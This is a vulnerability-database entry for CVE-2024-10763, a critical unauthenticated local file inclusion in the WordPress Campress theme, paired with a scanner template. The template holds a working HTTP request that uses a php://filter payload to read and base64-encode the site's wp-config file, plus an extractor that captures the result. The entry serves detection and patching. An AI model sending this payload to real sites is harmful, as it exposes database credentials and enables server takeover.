/Vulnerability Library

WordPress Campress Theme <= 1.35 - Unauthenticated Local File Inclusion

CVE-2024-10763
Verified

Description

Campress theme for WordPress up to 1.35 contains a local file inclusion caused by 'campress_woocommerce_get_ajax_products' function, letting unauthenticated attackers include and execute arbitrary PHP files, exploit requires no authentication.

Severity

Critical

CVSS Score

9.8

Exploit Probability

14%

Published Date

May 7, 2026

Template Author

pussycat0x

CVE-2024-10763.yaml
id: CVE-2024-10763

info:
  name: WordPress Campress Theme <= 1.35 - Unauthenticated Local File Inclusion
  author: pussycat0x
  severity: critical
  description: |
    Campress theme for WordPress up to 1.35 contains a local file inclusion caused by 'campress_woocommerce_get_ajax_products' function, letting unauthenticated attackers include and execute arbitrary PHP files, exploit requires no authentication.
  impact: |
    Attackers can include and execute arbitrary PHP files, leading to remote code execution and potential full server compromise.
  remediation:
    Update to the latest version beyond 1.35.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/campress/campress-135-unauthenticated-local-file-inclusion
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10763
    epss-score: 0.14415
    epss-percentile: 0.94607
    cwe-id: CWE-98
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,wordpress,wp-theme,campress,lfi,unauth

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=campress_woocommerce_get_ajax_products&layout=php://filter/convert.base64-encode/resource=/var/www/html/wp-config

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ZGVmaW5l"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 0
        regex:
          - '[A-Za-z0-9+/]{50,}={0,2}'
# digest: 4b0a00483046022100f80d84e63427bf67b9beaac339eed9e13215a19ab4a94a54f459c1456be558d802210093620c1157011920c3b23aa0922630be044ac728869212c8e2a7686783fbe2dc:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2024-10763
CWE ID:
cwe-98

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/campress/campress-135-unauthenticated-local-file-inclusion

Remediation Steps

Update to the latest version beyond 1.35.